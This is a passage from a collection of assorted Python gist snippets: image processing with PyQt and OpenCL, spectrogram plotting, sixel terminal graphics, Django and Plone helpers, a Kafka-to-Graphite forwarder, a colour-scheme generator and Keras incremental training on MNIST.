super(Widget, self).__init__(parent)
self.setWindowTitle('Gaussian Filter')
self.resize(300, 300)
self.setAcceptDrops(True)
self.image_label = QtGui.QLabel('Drag & drop image here')
layout = QtGui.QHBoxLayout()
layout.addWidget(self.image_label)
self.setLayout(layout)
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.accept()
else:
event.ignore()
def dropEvent(self, event):
filename = event.mimeData().urls()[0].path()
img = QtGui.QImage(filename)
start = time.time()
image = self.convert(img)
stop = time.time()
#print 'processing time', stop - start
pixmap = QtGui.QPixmap()
pixmap.convertFromImage(image)
self.image_label.setPixmap(pixmap)
def convert(self, img):
src = numpy.fromstring(img.bits().asstring(img.byteCount()), dtype=numpy.uint8)
src.shape = h, w, _ = img.height(), img.width(), 4
mf = cl.mem_flags
src_buf = cl.image_from_array(self.ctx, src, 4)
fmt = cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.UNSIGNED_INT8)
dest_buf = cl.Image(self.ctx, mf.WRITE_ONLY, fmt, shape=(w, h))
self.prg.convert(self.queue, (w, h), None, src_buf, dest_buf, numpy.int32(w), numpy.int32(h))
dest = numpy.empty_like(src)
cl.enqueue_copy(self.queue, dest, dest_buf, origin=(0, 0), region=(w, h))
return QtGui.QImage(str(dest.data), w, h, QtGui.QImage.Format_RGB32)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
window = Widget()
window.show()
sys.exit(app.exec_())
```
#### File: hard-gists/3760670/snippet.py
```python
from java.io import File
from java.io import FileInputStream
from java.util import Properties
#Load properties file in java.util.Properties
def loadPropsFil(propsFil):
properties={}
propFil = Properties()
propFil.load(FileInputStream(propsFil))
properties.update(propFil)
return properties
propertyfile='/opt/data/myfile.properties'
properties = loadPropsFil(propertyfile)
for key, value in properties.iteritems():
print "%s=%s" % (key, value)
dictName="MyDictDev2"
dictId='Environments/%s'%dictName
if repository.exists(dictId):
print "update dictionary '%s'" % dictId
dict=repository.read(dictId)
dict.values['entries'].putAll(properties)
repository.update(dict)
else:
print "new dictionary created '%s'" % dictId
dict=repository.create(factory.configurationItem(dictId, 'udm.Dictionary', {'entries':properties}))
```
#### File: hard-gists/3772157/snippet.py
```python
import numpy
import scipy
import matplotlib.pyplot as pyplot
def decibel(lin):
"""Convert amplitude to decibel.
We might later need power to decibel..."""
return 20*numpy.log10(norm(lin))
def norm(sig):
"""Normalisze signal."""
sig_max = numpy.float(
numpy.max(
numpy.abs(sig)
)
)
return sig / sig_max
def stft(
x,
fs,
framesz,
hop
):
"""Short time fourier transform.
x : signal.
fs : sampling frequency.
framesz : short time window size in seconds (y-resolution).
hop : window movement in seconds (x-resolution).
"""
framesamp = int(framesz*fs)
hopsamp = int(hop*fs)
w = scipy.hamming(framesamp)
X = scipy.array([scipy.fft(w*x[i:i+framesamp])
for i in range(
0,
len(x)-framesamp,
hopsamp
)])
return X
def logarithmicPrune(
spec,
y,
size
):
"""Does a logarithmic prune. Removes rows from a spectrogram in a logarithmic
fashion. It should improove performance of plotting functions. In the higher
frequencies more rows are pruned than in the lower. Making the distribution
of rows linear again.
We prune the spectogram and the y-axis with the same function, in order to
avoid mismatchs.
spec : The spectogram to prune.
y : The y-axis that belongs to that spectrum.
size : The new size of the array."""
# Allocate lists
speclist = size*[None]
ylist = size*[None]
i_max = len(spec)
    # Calculate the scaling of the indexes during the prune
    # TODO: I have absolutely no idea why I need sqrt. Would be nice to
    # understand what I am doing.
scale = (i_max) / numpy.exp(numpy.sqrt(size-1))
index = 0
# Slice the spectrogram and select rows.
for i in range(0, size):
speclist[i] = spec[int(index)].copy()
ylist[i] = y[int(index)].copy()
exp_val = numpy.exp(numpy.sqrt(i)) * scale
        # If the resample index didn't grow by a whole integer, we enforce that.
if exp_val < (index + 1):
index += 1
else:
index = int(exp_val)
return (
numpy.array(speclist),
numpy.array(ylist)
)
def spectrogram(
data,
fs,
framesz=0.5,
hop=0.01,
yprune=600,
fmax = None
):
"""Display a spectrograph.
data : signal.
fs : sampling frequency.
framesz : short time window size in seconds (y-resolution).
hop : window movement in seconds (x-resolution).
yprune : y-resolution in rows (Should be more than target the resolution).
fmax : Max frequency to display. Cuts the spectrogram."""
C = stft(data, fs, framesz, hop).T
# Set ylen from fmax if provided.
if fmax == None:
fmax = fs/2
ylen = fmax/2
# Cut the unwanted frequecies.
C = C[1:ylen]
# Get the len from the new array (just to be sure).
ylen = len(C)
# Create a linear space for the x-axis.
x = numpy.linspace(
0,
len(data)/fs,
len(C[0])
)
# Create logarithmic space for the y-axis.
y = numpy.log(numpy.linspace(
1,
fmax,
ylen
))
# Prune the the lines that are beyond resolution.
(d, y) = logarithmicPrune(
C,
y,
yprune
);
# Convert amplitudes to decibel
d = decibel(numpy.absolute(d))
# Create a meshgrid for the plotting function. This is a format conversion.
X, Y = numpy.meshgrid(x, y);
# Plot and set labels
pyplot.pcolor(X, Y, d);
pyplot.ylabel("Frequency (Hz) ");
pyplot.xlabel('Time (seconds)');
ax = pyplot.gca()
liny = numpy.linspace(
1,
numpy.log(fmax),
10
)
# Set the ticks along the log-space
ax.set_yticks(liny)
# The tick labes must be frequencies, so we have to invert log again.
ax.set_yticklabels(["%.2f" % x for x in numpy.exp(liny)])
# Colorbar with label.
pyplot.colorbar().set_label("Amplitude (dB)")
return C.shape
```
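A small driver sketch (hypothetical; it assumes the functions above live in the same module and that `example.wav` is a placeholder for a mono WAV file — the parameter values are illustrative only):
```python
# hypothetical usage of the functions above, not part of the original gist
import numpy
import scipy.io.wavfile
import matplotlib.pyplot as pyplot

fs, sig = scipy.io.wavfile.read('example.wav')   # placeholder input file
sig = sig.astype(numpy.float64)                  # stft expects a float signal
spectrogram(sig, fs, framesz=0.05, hop=0.01, yprune=400, fmax=8000)
pyplot.show()
```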
#### File: hard-gists/3806329/snippet.py
```python
import sys, termios, StringIO
import Image # PIL
class SixelConverter:
def __init__(self, image, f8bit = False):
if f8bit: # 8bit mode
self.DCS='\x90'
self.ST='\x9c'
else:
self.DCS='\x1bP'
self.ST='\x1b\\'
self.palette = image.getpalette()
self.data = image.getdata()
self.width, self.height = image.size
def __write_header(self, output):
# start Device Control String (DCS)
output.write(self.DCS)
# write header
output.write('0;0;8q"1;1')
def __write_palette_section(self, output):
palette = self.palette
# write palette section
for i in range(0, len(palette), 3):
output.write('#' + str(i / 3) + ";2;")
output.write(str(palette[i] * 100 / 256) + ";")
output.write(str(palette[i + 1] * 100 / 256) + ";")
output.write(str(palette[i + 2] * 100 / 256))
def __write_body_section(self, output):
data = self.data
#write body section
height = self.height
width = self.width
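        # one pass per pixel row: runs of equal colour are emitted with the sixel
        # repeat introducer '!<count>', '$' rewinds to the start of the line and
        # '-' moves down to the next band of six pixel rows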
for y in range(0, height):
            c = chr(pow(2, y % 6) + 63)
            cachedNo = data[y * width]
            count = 0
            for x in range(0, width):
                colorNo = data[y * width + x]
                if colorNo == cachedNo:
                    count += 1
                    continue
                if count > 1:
                    output.write('#' + str(cachedNo) + '!' + str(count) + c)
                else:
                    output.write('#' + str(cachedNo) + c)
                cachedNo = colorNo
                count = 1
            if count > 1:
                output.write('#' + str(cachedNo) + '!' + str(count) + c)
            else:
                output.write('#' + str(cachedNo) + c)
output.write('$') # write line terminator
if y % 6 == 5:
output.write('-') # write sixel line separator
def __write_terminator(self, output):
# write ST
output.write(self.ST) # terminate Device Control String
def getvalue(self):
output = StringIO.StringIO()
try:
self.__write_header(output)
self.__write_palette_section(output)
self.__write_body_section(output)
self.__write_terminator(output)
value = output.getvalue()
finally:
output.close()
return value
class CellSizeDetector:
def __set_raw(self):
fd = sys.stdin.fileno()
backup = termios.tcgetattr(fd)
try:
new = termios.tcgetattr(fd)
new[0] = 0 # c_iflag = 0
# new[3] = 0 # c_lflag = 0
new[3] = new[3] &~ (termios.ECHO | termios.ICANON)
termios.tcsetattr(fd, termios.TCSANOW, new)
except:
termios.tcsetattr(fd, termios.TCSANOW, backup)
return backup
def __reset_raw(self, old):
fd = sys.stdin.fileno()
termios.tcsetattr(fd, termios.TCSAFLUSH, old)
def __get_report(self, query):
sys.stdout.write(query)
result = ''
while True:
c = sys.stdin.read(1)
if c == 't':
break
result += c
return result
def get_size(self):
backup_termios = self.__set_raw()
try:
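            # CSI 14 t reports the text area size in pixels and CSI 18 t reports
            # it in character cells; dividing the two gives the size of one cell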
(height, width) = self.__get_report("\x1b[14t").split(';')[1:]
(row, column) = self.__get_report("\x1b[18t").split(';')[1:]
char_width = int(width) / int(column)
char_height = int(height) / int(row)
finally:
self.__reset_raw(backup_termios)
return char_width, char_height
class SixelWriter:
def __init__(self, f8bit = False):
if f8bit: # 8bit mode
self.CSI='\x9b'
else:
self.CSI='\x1b['
def save_position(self):
sys.stdout.write('\x1b7')
def restore_position(self):
sys.stdout.write('\x1b8')
def move_x(self, n, fabsolute):
sys.stdout.write(self.CSI)
if fabsolute:
sys.stdout.write(str(n) + '`')
else:
if n > 0:
sys.stdout.write(str(n) + 'C')
elif n < 0:
sys.stdout.write(str(-n) + 'D')
def move_y(self, n, fabsolute):
sys.stdout.write(self.CSI)
if fabsolute:
sys.stdout.write(str(n) + 'd')
else:
if n > 0:
sys.stdout.write(str(n) + 'B')
elif n < 0:
sys.stdout.write(str(-n) + 'A')
def draw(self, filename, abs, x = None, y = None, w = None, h = None):
image = Image.open(filename)
image = image.convert("P")
if not (w is None and h is None):
width, height = image.size
if w == None:
h = height
if h == None:
w = width
print h,'-', w
image = image.resize((w, h))
self.save_position()
try:
if not x is None:
self.move_x(x, abs)
if not y is None:
self.move_y(y, abs)
sixel_converter = SixelConverter(image, options.f8bit)
sys.stdout.write(sixel_converter.getvalue())
finally:
self.restore_position()
if __name__ == '__main__':
import optparse, re
parser = optparse.OptionParser()
parser.add_option("-8", "--8bit-mode",
action="store_true",
dest="f8bit",
help="Generate a sixel image for 8bit terminal or printer")
parser.add_option("-7", "--7bit-mode",
action="store_false",
dest="f8bit",
help="Generate a sixel image for 7bit terminal or printer")
parser.add_option("-r", "--relative-position",
default=False,
action="store_false",
dest="fabsolute",
help="Treat specified position as relative one")
parser.add_option("-a", "--absolute-position",
action="store_true",
dest="fabsolute",
help="Treat specified position as absolute one")
parser.add_option("-x", "--left",
dest="left",
help="Left position in cell size, or pixel size with unit 'px'")
parser.add_option("-y", "--top",
dest="top",
help="Top position in cell size, or pixel size with unit 'px'")
parser.add_option("-w", "--width",
dest="width",
help="Width in cell size, or pixel size with unit 'px'")
parser.add_option("-e", "--height",
dest="height",
help="Height in cell size, or pixel size with unit 'px'")
options, args = parser.parse_args()
filename = args[0]
char_width, char_height = CellSizeDetector().get_size()
left = options.left
if not left is None:
pos = left.find("px")
if pos == len(left) - 2:
left = int(left[:pos]) / char_width
else:
left = int(left)
top = options.top
if not top is None:
pos = top.find("px")
if pos == len(top) - 2:
top = int(top[:pos]) / char_width
else:
top = int(top)
width = options.width
if not width is None:
pos = width.find("px")
if pos == len(width) - 2:
width = int(width[:pos])
else:
width = int(width) * char_width
height = options.height
if not height is None:
pos = height.find("px")
if pos == len(height) - 2:
height = int(height[:pos])
else:
height = int(height) * char_height
writer = SixelWriter(options.f8bit)
writer.draw(filename, abs = options.fabsolute,
x = left, y = top, w = width, h = height)
```
#### File: hard-gists/3832818/snippet.py
```python
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from django.contrib.sites.models import Site
from django.db import transaction
from cms.models import Page
class Command(BaseCommand):
help = 'Copy the CMS pagetree from a specific SITE_ID.'
option_list = BaseCommand.option_list + (
make_option('--from', dest='from_site', default=None,
help='Specifies the SITE_ID to copy from.'),
make_option('--to', dest='to_site', default=None,
help='Specifies the SITE_ID to copy to.')
)
def handle(self, *args, **options):
from_site = options.get('from_site', None)
to_site = options.get('to_site', None)
if not from_site or not to_site:
raise CommandError("You must use --from and --to to use this command.")
self.get_site(from_site)
site = self.get_site(to_site)
pages = Page.objects.filter(site=from_site, level=0)
with transaction.commit_on_success():
for page in pages:
page.copy_page(None, site)
Page.objects.filter(site=to_site).update(published=True)
self.stdout.write("Copied CMS Tree from SITE_ID {0} successfully to SITE_ID {1}.\n".format(from_site, to_site))
def get_site(self, site_id):
try:
return Site.objects.get(pk=site_id)
except Site.DoesNotExist:
raise CommandError("\nUnknown site: {0}. Please create a new site first.\n".format(site_id))
```
#### File: hard-gists/3834979/snippet.py
```python
from django.template import Library, Node, Variable, \
VariableDoesNotExist, TemplateSyntaxError
register = Library()
def get_var(v, context):
try:
return v.resolve(context)
except VariableDoesNotExist:
return v.var
class ReplaceNode(Node):
def __init__(self, s, old, new):
self.s = Variable(s)
self.old = Variable(old)
self.new = Variable(new)
def render(self, context):
s = unicode(get_var(self.s, context))
old = unicode(get_var(self.old, context))
new = unicode(get_var(self.new, context))
return s.replace(old, new)
@register.tag
def replace(parser, token):
args = token.split_contents()[1:]
if len(args) != 3:
raise TemplateSyntaxError, '%r tag requires a string, an old value, and a new value.' % token.contents.split()[0]
return ReplaceNode(*args)
```
#### File: hard-gists/3931936/snippet.py
```python
from optparse import OptionParser
from brod.zk import *
import pickle
import struct
import socket
import sys
import time
class Graphite:
def __init__(self, host='localhost', port=2004, retry=5, delay=3, backoff=2, timeout=10):
self.host = host
self.port = port
self.retry = retry
self.delay = delay
self.backoff = backoff
self.timeout = timeout
# Create initial socket
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.settimeout(self.timeout)
# Initiate connection
self.connect()
def _backoff(self, retry, delay, backoff):
"""Exponential backoff."""
retry -= 1
if retry == 0:
raise Exception('Timeout')
time.sleep(delay)
delay *= backoff
return retry, delay, backoff
def _retry(self, exception, func, *args):
"""Retry calling the func catching a tuple of exceptions with backoff."""
retry = self.retry
delay = self.delay
backoff = self.backoff
while retry > 0:
try:
return func(*args)
except exception, e:
retry, delay, backoff = self._backoff(retry, delay, backoff)
def connect(self):
"""Connect to graphite."""
retry = self.retry
backoff = self.backoff
delay = self.delay
while retry > 0:
try:
# Attempt to connect to Graphite, break if success
self.conn.connect((self.host, self.port))
break
except socket.error, e:
# Ditch this socket. Create a new one
self.conn.close()
                self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.conn.settimeout(self.timeout)
retry, delay, backoff = self._backoff(retry, delay, backoff)
def close(self):
"""Close connection go Graphite."""
self.conn.close()
def send(self, data, retry=3):
"""Send data to graphite."""
retry = self.retry
backoff = self.backoff
delay = self.delay
# Attempt to send any data in the queue
while retry > 0:
# Check socket
if not self.conn:
                # Attempt to re-establish the connection
self.close()
self.connect()
retry, delay, backoff = self._backoff(retry, delay, backoff)
continue
try:
# Send data to socket
self.conn.sendall(data)
break
except socket.error, e:
self.close()
self.connect()
retry, delay, backoff = self._backoff(retry, delay, backoff)
continue
def _pickle(batch):
"""Pickle metrics into graphite format."""
payload = pickle.dumps(batch)
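    # carbon's pickle receiver expects a 4-byte big-endian length header
    # followed by the pickled [(path, (timestamp, value)), ...] payload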
header = struct.pack("!L", len(payload))
message = header + payload
return message
def _convert(msg):
"""Convert a graphite key value string to pickle."""
path, timestamp, value = msg.split(' ')
m = (path, (timestamp, value))
return m
def _connect_zookeeper(zk, group, topic, autocommit=True):
"""Connect to ZooKeeper ensemble."""
consumer = ZKConsumer(zk, group, topic, autocommit)
return consumer
if __name__ == "__main__":
batch = []
parser = OptionParser()
parser.add_option("-z", "--zk", dest="zookeeper", default="localhost:2181", help="Kafka ZooKeeper quorum")
parser.add_option("-t", "--topic", dest="topic", help="Kafka topic")
parser.add_option("-c", "--consumer", dest="consumer_group", default="graphite", help="Kafka consumer group")
parser.add_option("-H", "--host", dest="graphite_host", default="localhost", help="Graphite host")
parser.add_option("-p", "--port", dest="graphite_port", type=int, default=2004, help="Graphite port")
parser.add_option("-k", "--pickle", dest="pickle_batch", action="store_true", help="Pickle the graphite batches")
parser.add_option("-b", "--batch", dest="batch_size", type=int, default=200, help="Graphite pickle batch size")
parser.add_option("-i", "--interval", dest="poll", type=int, default=15, help="Poll interval for Kafaka topic")
(options, args) = parser.parse_args()
# Assign OptParse variables
consumer_group = options.consumer_group
topic = options.topic
zookeeper = options.zookeeper
batch_size = options.batch_size
pickle_batch = options.pickle_batch
host = options.graphite_host
port = options.graphite_port
poll = options.poll
# Connect to Graphite
try:
graphite = Graphite(host, port)
except socket.error, e:
print "Could not connect to graphite host %s:%s" % (host, port)
sys.exit(1)
except socket.gaierror, e:
print "Invalid hostname for graphite host %s" % (host)
sys.exit(1)
# Connect to ZooKeeper
try:
consumer = _connect_zookeeper(zookeeper, consumer_group, topic)
except ZKConnectError, e:
print "Could not connect to zookeeper ensemble %s" % (zookeeper)
sys.exit(1)
# Consume Kafka topic
for msg_set in consumer.poll(poll_interval=poll):
for offset, msg in msg_set:
if pickle_batch:
# Convert metric to Pickle format, and append batch
batch.append(_convert(msg))
else:
# Append string to list
batch.append(msg)
# Check to see if we should send metrics to Graphite
if len(batch) >= batch_size:
# Pickle metrics if set to true
if pickle_batch:
# Pickle graphite batch
pickled = _pickle(batch)
graphite.send(pickled)
else:
# Send metrics to Graphite. Convert list to string
graphite.send("\n".join(batch))
# Clear batch. Successfully sent
print "Sent %s metrics to Graphite" % (len(batch))
batch = []
```
#### File: hard-gists/3946121/snippet.py
```python
import sys
import colorsys
from colorz import colorz
WALLPAPER = '/home/james/.wallpaper'
COLORS = '/home/james/.colors'
XRESOURCES = '/home/james/.Xresources'
cols = ''
xres = """
URxvt.font: -*-unifont-medium-*-*-*-16-*-*-*-*-*-*-*
URxvt.boldFont: -*-unifont-medium-*-*-*-16-*-*-*-*-*-*-*
URxvt.perl-ext-common: default,keyboard-select,url-select,clipboard
URxvt.modifier: super
! Original Colors
! urxvt*color8: #4DA869
! urxvt*color9: #EF2929
! urxvt*color10: #BDA2BF
! urxvt*color11: #FFF391
! urxvt*color12: #7587A6
! urxvt*color13: #F0C47B
! urxvt*color14: #FF4040
! urxvt*color15: #EEEEEC
! urxvt*color0: #2E3436
! !urxvt*color0: #000000
! urxvt*color1: #DD1144
! urxvt*color2: #9B859D
! urxvt*color3: #F9EE98
! urxvt*color4: #424D5E
! urxvt*color5: #CDA869
! urxvt*color6: #E94444
! urxvt*color7: #C2C2C2
! Keyboard select
URxvt.keysym.M-Escape: perl:keyboard-select:activate
URxvt.keysym.M-s: perl:keyboard-select:search
! URL select
URxvt.keysym.M-u: perl:url-select:select_next
URxvt.url-select.autocopy: true
URvxt.url-select.button: 1
URvxt.url-select.launcher: mimeo
URxvt.url-select.underline: true
! Clipboard
URxvt.keysym.M-c: perl:clipboard:copy
URxvt.keysym.M-v: perl:clipboard:paste
URxvt.keysym.M-C-v: perl:clipboard:paste_escaped
URxvt.foreground: #ffffff
URxvt.scrollBar: false
URxvt.depth: 32
URxvt.background: [85]#0E0E0E
! Colorz
"""
def normalize(hexv, minv=128, maxv=256):
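    # clamp the brightness (HSV value channel) of a '#rrggbb' colour into
    # [minv/256, maxv/256] and return the adjusted colour as hex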
hexv = hexv[1:]
r, g, b = (
int(hexv[0:2], 16) / 256.0,
int(hexv[2:4], 16) / 256.0,
int(hexv[4:6], 16) / 256.0,
)
h, s, v = colorsys.rgb_to_hsv(r, g, b)
minv = minv / 256.0
maxv = maxv / 256.0
if v < minv:
v = minv
if v > maxv:
v = maxv
r, g, b = colorsys.hsv_to_rgb(h, s, v)
return '#{:02x}{:02x}{:02x}'.format(int(r * 256), int(g * 256), int(b * 256))
if __name__ == '__main__':
if len(sys.argv) == 1:
n = 16
else:
n = int(sys.argv[1])
i = 0
with open('colorz.html', 'w') as f:
f.write("""<img src="file://{}" height=200/>""".format(WALLPAPER))
for c in colorz(WALLPAPER, n=n):
# if i == 8:
# i += 1
if i == 0:
c = normalize(c, minv=0, maxv=32)
elif i == 8:
c = normalize(c, minv=128, maxv=192)
elif i < 8:
c = normalize(c, minv=160, maxv=224)
else:
c = normalize(c, minv=200, maxv=256)
f.write("""
<div style="background-color: {0}; width: 100%; height: 50px">{1}: {0}</div>
""".format(c, i)
)
xres += """urxvt*color{}: {}\n""".format(i, c)
cols += """export COLOR{}="{}"\n""".format(i, c)
i += 1
with open(XRESOURCES, 'w') as f:
f.write(xres)
with open(COLORS, 'w') as f:
f.write(cols)
```
#### File: hard-gists/398429347c96e98aba88/snippet.py
```python
import concurrent.futures
import operator
import sys
from queue import Queue
import pafy
import requests
q = Queue()
#conf = "europython-2014"
#conf = "pycon-us-2014"
#conf = "pycon-us-2013"
#conf = "pycon-us-2012"
conf = "pycon-us-2015"
conf_url = "http://pyvideo.org/api/v2/category/{conf}?format=json".format(conf=conf)
class Video():
def __init__(self, url):
self.json_url = "{url}?format=json".format(url=url)
r = requests.get(self.json_url)
self.d = r.json()
self.youtube_link = self.d["source_url"]
self.process(self.youtube_link)
def process(self, youtube_link):
v = pafy.new(youtube_link)
self.views = v.viewcount
self.ups = v.likes
self.downs = v.dislikes
self.title = v.title
self.speakers = ", ".join(self.d['speakers'])
@staticmethod
def header():
return "{:>8} {:>6} {:>6} {} ({})".format("Views", "Ups", "Downs", "Title", "Speakers")
def __str__(self):
return "{:8,} {:6,} {:6,} {} ({})".format(self.views, self.ups, self.downs, self.title, self.speakers)
def process(video):
v = Video(video)
q.put(v)
sys.stdout.write('.'); sys.stdout.flush()
def main():
print(conf)
#
r = requests.get(conf_url)
d = r.json()
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
for video in d['videos']:
executor.submit(process, video)
#
print()
li = []
while not q.empty():
li.append(q.get())
#
li.sort(key=operator.attrgetter("views"), reverse=True)
print(Video.header())
for e in li:
print(e)
##############################################################################
if __name__ == "__main__":
main()
```
#### File: hard-gists/3990769/snippet.py
```python
from plone.behavior.interfaces import IBehavior
from plone.dexterity.behavior import DexterityBehaviorAssignable
from zope.annotation import IAnnotations
from zope.component import queryUtility
from zope.interface import alsoProvides, noLongerProvides
INSTANCE_BEHAVIORS_KEY = KEY = 'g24.elements.instance_behaviors'
class DexterityInstanceBehaviorAssignable(DexterityBehaviorAssignable):
""" Support per instance specification of plone.behavior behaviors
"""
def __init__(self, context):
super(DexterityInstanceBehaviorAssignable, self).__init__(context)
annotations = IAnnotations(context)
self.instance_behaviors = annotations.get(KEY, ())
def enumerateBehaviors(self):
self.behaviors = self.fti.behaviors + self.instance_behaviors
for name in self.behaviors:
behavior = queryUtility(IBehavior, name=name)
if behavior is not None:
yield behavior
def enable_behaviors(obj, behaviors, ifaces):
""" Enable behaviors on an object.
:param obj: The Dexterity content object to enable behaviors on.
:type obj: object
:param behaviors: Behaviors to be enabled on the object. This is a list of
dotted names of behavior schema interfaces.
:type behaviors: list
:param ifaces: Behavior marker interfaces belonging to the behaviors to be
enabled. This is a list of interface classes.
    :type ifaces: list
Use it like so:
>>> from plone.app.event.dx.interfaces import IDXEvent
>>> enable_behaviors(obj, ['plone.app.event.dx.behaviors.IEventBasic',],
... [IDXEvent,])
"""
annotations = IAnnotations(obj)
instance_behaviors = annotations.get(KEY, ())
instance_behaviors += behaviors
annotations[KEY] = instance_behaviors
for iface in ifaces:
alsoProvides(obj, iface)
    obj.reindexObject(idxs=('object_provides',))
def disable_behaviors(obj, behaviors, ifaces):
""" Disable behaviors on an object.
:param obj: The Dexterity content object to disable behaviors on.
:type obj: object
:param behaviors: Behaviors to be disabled on the object. This is a list of
dotted names of behavior schema interfaces.
:type behaviors: list
:param ifaces: Behavior marker interfaces belonging to the behaviors to be
disabled. This is a list of interface classes.
    :type ifaces: list
Use it like so:
>>> from plone.app.event.dx.interfaces import IDXEvent
>>> disable_behaviors(obj, ['plone.app.event.dx.behaviors.IEventBasic',],
... [IDXEvent,])
"""
annotations = IAnnotations(obj)
instance_behaviors = annotations.get(KEY, ())
instance_behaviors = filter(lambda x: x not in behaviors,
instance_behaviors)
annotations[KEY] = instance_behaviors
for iface in ifaces:
noLongerProvides(obj, iface)
    obj.reindexObject(idxs=('object_provides',))
```
#### File: hard-gists/3a2a081e4f3089920fd8aecefecbe280/snippet.py
```python
from __future__ import print_function
import numpy as np
np.random.seed(1) # for reproducibility
from keras.datasets import mnist
from keras.models import Sequential, model_from_json
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.utils import np_utils
def build_data(classes,total_classes,X_train_all,y_train_all,X_test_all,y_test_all):
train_ind = []
test_ind = []
for c in classes:
train_ind.extend(list(np.where(y_train_all==c)[0]))
test_ind.extend(list(np.where(y_test_all==c)[0]))
X_train = X_train_all[train_ind,:,:]
X_test = X_test_all[test_ind,:,:]
y_train_true = y_train_all[train_ind]
y_train = np.zeros(y_train_true.shape)
y_test_true = y_test_all[test_ind]
y_test = np.zeros(y_test_true.shape)
for i,c in enumerate(classes):
train_ind = list(np.where(y_train_true==c)[0])
test_ind = list(np.where(y_test_true==c)[0])
y_train[train_ind] = i
y_test[test_ind] = i
X_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)
X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
# convert class vectors to binary class matrices
Y_train = np_utils.to_categorical(y_train, total_classes)
Y_test = np_utils.to_categorical(y_test, total_classes)
return X_train, Y_train, X_test, Y_test
def build_model(old_model=None):
model = Sequential()
if old_model is None:
model.add(Convolution2D(nb_filters, nb_conv, nb_conv,
border_mode='valid',
input_shape=(1, img_rows, img_cols)))
else:
weights = old_model.layers[0].get_weights()
model.add(Convolution2D(nb_filters, nb_conv, nb_conv,
border_mode='valid',weights=weights,
input_shape=(1, img_rows, img_cols)))
model.add(Activation('relu'))
if old_model is None:
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
else:
weights = old_model.layers[2].get_weights()
model.add(Convolution2D(nb_filters, nb_conv, nb_conv,weights=weights))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
model.add(Flatten())
if old_model is None:
model.add(Dense(128))
else:
weights = old_model.layers[7].get_weights()
model.add(Dense(128,weights=weights))
model.add(Activation('relu'))
model.add(Dropout(0.5))
return model
if __name__ == '__main__':
MODEL_TRAINED = False
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
(X_train_all, y_train_all), (X_test_all, y_test_all) = mnist.load_data()
if not MODEL_TRAINED:
batch_size = 256
total_classes = 10
nb_epoch = 12
# number of convolutional filters to use
nb_filters = 32
# size of pooling area for max pooling
nb_pool = 2
# convolution kernel size
nb_conv = 3
classes = [9,1,6]
X_train, Y_train, X_test, Y_test = build_data(classes,3,
X_train_all,y_train_all,X_test_all,y_test_all)
model1 = build_model()
model1.add(Dense(len(classes)))
model1.add(Activation('softmax'))
model1.compile(loss='categorical_crossentropy',optimizer='adadelta',metrics=['accuracy'])
model1.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch,
verbose=1, validation_data=(X_test, Y_test))
# Save this model for later interrogation
json_string = model1.to_json()
open('model1_incremental_architecture.json', 'w').write(json_string)
model1.save_weights('model1_incremental_weights.h5')
score = model1.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print('Test accuracy:', score[1])
# Now create a new model with all total_classes in the softmax layer. Copy over the weights to
# this new network and initialize the new class connections randomly.
model2 = build_model(old_model=model1)
model2.add(Dense(total_classes))
# Replace the corresponding weights of the new network with the previously trained class weights
weights = model2.layers[-1].get_weights()
old_weights = model1.layers[-2].get_weights() # Last dense layer is second to last layer
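        # the previously trained classes occupy the last len(classes) softmax
        # units, matching their position at the end of class_mapping defined below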
weights[0][:,-len(classes):] = old_weights[0]
weights[1][-len(classes):] = old_weights[1]
model2.layers[-1].set_weights(weights)
model2.add(Activation('softmax'))
model2.compile(loss='categorical_crossentropy',optimizer='adadelta',metrics=['accuracy'])
new_classes = [7, 0, 3, 5, 2, 8, 4]
class_mapping = new_classes[:]
class_mapping.extend(classes)
X_train, Y_train, X_test, Y_test = build_data(new_classes,10,
X_train_all,y_train_all,X_test_all,y_test_all)
model2.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch,
verbose=1, validation_data=(X_test, Y_test))
score = model2.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print('Test accuracy:', score[1])
# Save the incrementally trained model
json_string = model2.to_json()
open('model2_incremental_architecture.json', 'w').write(json_string)
model2.save_weights('model2_incremental_weights.h5')
X_test = X_test_all.reshape(X_test_all.shape[0], 1, img_rows, img_cols)
X_test = X_test.astype('float32')
X_test /= 255
# Convert class vectors to binary class matrices
        # Note that when a new image is presented to this network, the label of the image must be
# fed into class_mapping to get the "real" label of the output
y_test = np.array([class_mapping.index(c) for c in y_test_all])
Y_test = np_utils.to_categorical(y_test, total_classes)
score = model2.evaluate(X_test, Y_test, verbose=1)
print('Total Test score:', score[0])
print('Total Test accuracy:', score[1])
else:
# Load the incrementally trained model and test it
model = model_from_json(open('model2_incremental_architecture.json').read())
model.load_weights('model2_incremental_weights.h5')
model.compile(loss='categorical_crossentropy',optimizer='adadelta',metrics=['accuracy'])
classes = [7, 0, 3, 5, 2, 8, 4, 9, 1, 6]
X_train, Y_train, X_test, Y_test = build_data(classes,10,
X_train_all,y_train_all,X_test_all,y_test_all)
score = model.evaluate(X_test, Y_test, verbose=1)
print('Total Test score:', score[0])
print('Total Test accuracy:', score[1])
score = model.evaluate(X_train, Y_train, verbose=1)
print('Total Train score:', score[0])
print('Total Train accuracy:', score[1])
```
#### File: hard-gists/3b71a120ae7789956ef8/snippet.py
```python
import zipfile
import PyPDF2
from subprocess import Popen, PIPE
from pptx import Presentation
import xlrd
import sys
thismodule = sys.modules[__name__]
